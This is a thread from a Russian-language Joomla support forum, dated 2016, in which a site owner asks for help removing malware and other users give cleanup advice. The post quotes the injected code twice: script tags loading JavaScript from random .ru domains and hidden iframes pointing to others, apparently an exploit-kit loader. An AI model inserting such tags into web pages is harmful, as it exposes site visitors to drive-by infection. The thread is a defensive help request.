Форум русской поддержки Joomla!® CMS
17.08.2017, 10:08:12 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Основной курс по Joomla
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Динамический вирус на сайте в JS и в IFRAME

 (Прочитано 408 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Dusk09
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 88


« : 26.12.2016, 15:00:01 »

Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины http://imgur.com/a/42Om7
Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>
Записан
ProtectYourSite
Живу я здесь
******

Репутация: +50/-4
Offline Offline

Сообщений: 835



« Ответ #1 : 26.12.2016, 15:49:28 »

Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет
Записан
Gosha5767
Завсегдатай
*****

Репутация: +21/-0
Offline Offline

Пол: Мужской
Сообщений: 448



« Ответ #2 : 26.12.2016, 16:08:42 »

Попробуйте методом исключения, т.е. по очереди отключайте компоненты, плагины, модули и проверяйте сканером.
программа Xenu`s Link Sleuth - в помощь
Записан
Dusk09
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 88


« Ответ #3 : 26.12.2016, 16:21:11 »

Проверять надо всё: может быть и в базе данных ( в модуле или статье какой), может подключаться плагином, шаблоном или каким-то компонентом. Надо проверять все файлы.
Конкретно в вашем случае, эти скрипты уже скорее всего подключаются или генерируются функцией, необходимо её сначала определить, иначе поиск никуда не приведет
искал на локальной копии сайта...
Записан
winstrool
Живу я здесь
******

Репутация: +41/-2
Offline Offline

Пол: Мужской
Сообщений: 802


Свободен для работы


« Ответ #4 : 26.12.2016, 16:25:42 »

Здравсвуйте! Перечитал весь форум, перепробовал все сканеры, но они только обнаруживают проблему, перепробовал все методы поиска по куску кода (base64, eval ) погоите. пожалуйста..определить где он живет. как вылечить...скрины http://imgur.com/a/42Om7
Вот что в  Head
<script src="http://13t0h6f0f7s.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>
<script src="http://cbbze5u2m65vg8.ru/ajs/14945/c/7374756462696c65742e636f6d2e7561_0.js" type="text/javascript"></script>

и
BODY
<iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=14945" style="display: none;"></iframe>
<iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=14945" style="display: none;"></iframe>
Поздравляю вас! на вашем сайте похоже установили связку сплоитов, по моему мнению, это наверное самое ЗЛО, что может быть в заражение сайтов! а такие люди которые это делают, стараются более качественней подходят к своему ремеслу, там крутятся очень большие бабки, и соответствующие финансы входят в поддержку работоспособности подобного бизнеса, как минимум начните со своего компьютера, а потом переходите на лечение сайта.
Записан
draff
Практически профи
*******

Репутация: +174/-5
Offline Offline

Пол: Мужской
Сообщений: 2819


step by step


« Ответ #5 : 26.12.2016, 16:31:24 »

Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.
Записан
winstrool
Живу я здесь
******

Репутация: +41/-2
Offline Offline

Пол: Мужской
Сообщений: 802


Свободен для работы


« Ответ #6 : 26.12.2016, 16:35:55 »

Советую создать новый сайт в папке сайта, и проверить на iframe.
А проще не искать вирус/шелл в тяжелых случаях, а пересобрать заново сайт на новой версии Joomla и установленных расширений и подключить потом старую базу данных.
Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!
Записан
Dusk09
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 88


« Ответ #7 : 26.12.2016, 16:57:12 »

Суть в том что пересоздание сайта не поможет, тут комп протроянен и сколько бы сайтов ТС не сделал, взломщику будут доступны все его доступы, включая почты, соц. сетей месенеджеров и прочей лабудени...

Пройдитесь по сценарию скрипта увидите что подобная неприятность и вам загрузится если у вас уязвимый браузер... только рекомендую через TOR чтоб на самом деле не подцепить эту херь!
Не замечал что кто либо использует мои аккуанты... да и эти вирусы только на одном из трех сайтов ..подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.
« Последнее редактирование: 26.12.2016, 17:04:15 от Dusk09 » Записан
winstrool
Живу я здесь
******

Репутация: +41/-2
Offline Offline

Пол: Мужской
Сообщений: 802


Свободен для работы


« Ответ #8 : 26.12.2016, 17:03:24 »

Не замечал что кто либо использует мои аккуанты...подозреваю все таки плагины .... Мои действия ?? 1.Проверка компа антивирусом.
Ну это может пока не использовали.

Действия:
1. Чистите тщательно свой комп.
        проверти браузеры на сторонние расширения, они могут не детектиться АВ.
        обновляйте плагины, Adobe продукцию какая стоит и используется браузерами, сами браузеры, java
2. Меняете все пассы от чего у вас только может быть
3. Переходите к чистке сайта

Записан
draff
Практически профи
*******

Репутация: +174/-5
Offline Offline

Пол: Мужской
Сообщений: 2819


step by step


« Ответ #9 : 26.12.2016, 18:04:15 »

Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.
Записан
winstrool
Живу я здесь
******

Репутация: +41/-2
Offline Offline

Пол: Мужской
Сообщений: 802


Свободен для работы


« Ответ #10 : 26.12.2016, 19:42:53 »

Да не факт что комп ТС. Скрипт я проверил у drweb, есть в базе . (Зачем мне еще на комп грузить, если есть онлайн проверка)
Старый проверенный способ - проверка методом исключения. СОздал Joomla в папке рабочего сайта, нет вируса- значит проблема только в рабочем сайте.
Если есть желание то можно проверить сайты, расположенные на том же хостинге, на наличие вируса. Может сервак хостера взломан, и во все сайты прописывается вирус. У людей на взломанном серваке и в файлы HTML прописывался.
Это ка вариант, но не факт! поэтому в таком случае, все методы хороши.... тем более с таким типом заражения.
Записан
capricorn
Практически профи
*******

Репутация: +107/-1
Offline Offline

Сообщений: 1741


« Ответ #11 : 26.12.2016, 21:38:21 »

ТС, вы пробовали проверить домены, с которых вам подключены скрипты? Играми в интернете не увлекаетесь?
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet